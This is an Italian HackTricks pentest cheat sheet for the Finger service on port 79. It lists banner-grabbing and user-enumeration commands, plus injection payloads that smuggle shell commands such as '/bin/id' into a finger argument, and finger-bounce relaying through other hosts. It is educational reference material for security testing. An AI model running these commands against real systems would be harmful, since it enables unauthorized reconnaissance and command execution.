79 - Pentesting Finger
Reading time: 2 minutes
tip
Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.
Informazioni di base
Il programma/servizio Finger è utilizzato per recuperare dettagli sugli utenti del computer. Tipicamente, le informazioni fornite includono il nome utente, nome completo, e, in alcuni casi, dettagli aggiuntivi. Questi dettagli extra potrebbero comprendere la posizione dell'ufficio e il numero di telefono (se disponibile), l'ora in cui l'utente ha effettuato l'accesso, il periodo di inattività (tempo di inattività), l'ultima volta che la posta è stata letta dall'utente e i contenuti dei file di piano e progetto dell'utente.
Porta predefinita: 79
PORT STATE SERVICE
79/tcp open finger
Enumerazione
Acquisizione del banner/Connessione di base
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumerazione degli utenti
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
In alternativa, puoi utilizzare finger-user-enum da pentestmonkey, alcuni esempi:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap esegue uno script utilizzando script predefiniti
Metasploit utilizza più trucchi di Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Esecuzione comandi
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Usa un sistema come relay finger
finger user@host@victim
finger @internal@external
tip
Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.